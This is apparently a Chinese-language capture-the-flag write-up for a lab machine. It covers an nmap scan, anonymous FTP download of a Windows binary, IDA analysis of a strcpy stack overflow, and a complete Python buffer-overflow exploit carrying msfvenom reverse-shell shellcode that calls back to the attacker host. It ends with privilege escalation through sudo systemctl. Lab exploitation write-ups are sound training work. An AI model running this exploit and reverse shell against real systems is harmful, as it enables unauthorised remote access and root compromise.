1、找到靶机ip:192.168.75.21
nmap -sn 192.168.75.0/24
2、扫描靶机端口
root@chounana:~# nmap -A -p- 192.168.75.21
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.75.21
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 50992 Nov 16 15:59 login.exe
|_-rw-r--r-- 1 0 0 28613 Nov 16 15:59 login_support.dll
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.75.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:ED:BE:00 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/10%OT=21%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=6023E258%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.75.21
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.76 seconds
root@chounana:~#
3、ftp匿名连接21端口,发现一个exe文件和一个dll动态链接库,这不有点像我上一篇后半部分的pwn嘛,下载下来
4、先猜测一波前面的2371端口应该就是login.exe运行的端口,运行结果一样,证明猜想,接下来就是找到pwn的地方
5、将文件拖到ida中分析,同样的找到输出password的地方,f3函数里面也有一个strcpy函数,前面对输入的字符也有一些限制
int __stdcall ConnectionHandler(LPVOID lpThreadParameter)
{
int result; // eax
size_t v2; // eax
char Dst; // [esp+18h] [ebp-410h]
char *Dest; // [esp+400h] [ebp-28h]
int v5; // [esp+404h] [ebp-24h]
int v6; // [esp+408h] [ebp-20h]
SOCKET s; // [esp+40Ch] [ebp-1Ch]
void *v8; // [esp+410h] [ebp-18h]
char *buf; // [esp+414h] [ebp-14h]
int len; // [esp+418h] [ebp-10h]
unsigned int i; // [esp+41Ch] [ebp-Ch]
len = 4096;
buf = (char *)malloc(0x1000u);
v8 = malloc(0x400u);
memset(&Dst, 0, 0x3E8u);
memset(buf, 0, 0x1000u);
s = (SOCKET)lpThreadParameter;
result = send((SOCKET)lpThreadParameter, "Password:\n", 11, 0);
v6 = result;
if ( result == -1 )
{
closesocket(s);
result = 1;
}
else
{
while ( lpThreadParameter )
{
result = recv(s, buf, len, 0);
v5 = result;
if ( result > 0 )
{
Dest = (char *)malloc(0xB54u);
memset(Dest, 0, 0xB54u);
strncpy(Dest, buf, 0xB54u);
for ( i = 0; ; ++i )
{
v2 = strlen(Dest);
if ( v2 <= i )
break;
if ( Dest[i] == 45 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 46 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 70 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 71 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 89 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 94 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 96 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
}
f3(Dest);
memset(Dest, 0, 0xB54u);
closesocket(s);
return 0;
}
if ( v6 == -1 )
{
closesocket(s);
return 1;
}
}
}
return result;
}
f3函数,距离返回地址1702(0x6A2+4)个字节
char *__cdecl f3(char *Source)
{
char Dest; // [esp+16h] [ebp-6A2h]
return strcpy(&Dest, Source);
}
6、使用msf生成shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.75.13 LPORT=4444 -b '\x00\x0a\x2d\x2e\x46\x47\x59\x5e\x60' -f python
最终代码
#!/usr/bin/python3
import socket
buf=b''
target_ip='192.168.75.21'
target_port=2371
recv_buf=4096
junk = b'a' * 1702
ret_addr=b'\xb8\x12\x50\x62'
nops=b'\x90'*32 #必需
buf = b""
buf += b"\x33\xc9\xb1\x11\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
buf += b"\x13\x55\x91\xe7\x4e\x83\xeb\xfc\xe2\xf4\x64\x4a\x10"
buf += b"\xad\x06\xd2\xb4\x24\x57\x18\x06\xfe\x33\x5c\x67\xdd"
buf += b"\x0c\x21\xd8\x83\xd5\xd8\x9e\xb7\x3d\x51\x4f\x05\x58"
buf += b"\xf9\xe5\x4e\x51\x43\x6e\xaf\xe5\xf7\xb7\x1f\x06\x22"
buf += b"\xe4\xc7\xb4\x5c\x67\x1c\x3d\xff\xc8\x3d\x3d\xf9\xc8"
buf += b"\x61\x37\xf8\x6e\xad\x07\xc2\x6e\xaf\xe5\x9a\x2a\xce"
payload = b''
payload += junk
payload += ret_addr
payload += nops
payload += buf
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
clientSock.connect((target_ip,target_port))
data_from_srv = clientSock.recv(recv_buf)
print(f"Reply --> {data_from_srv}")
print(f"Sending --> {payload}")
clientSock.sendall(payload)
7、本地监听,成功反弹shell,python提权到tty,得到第一个flag
使用sudo -l命令发现可以免密使用root身份执行systemctl命令,使用systemctl提权成功,拿到最终flag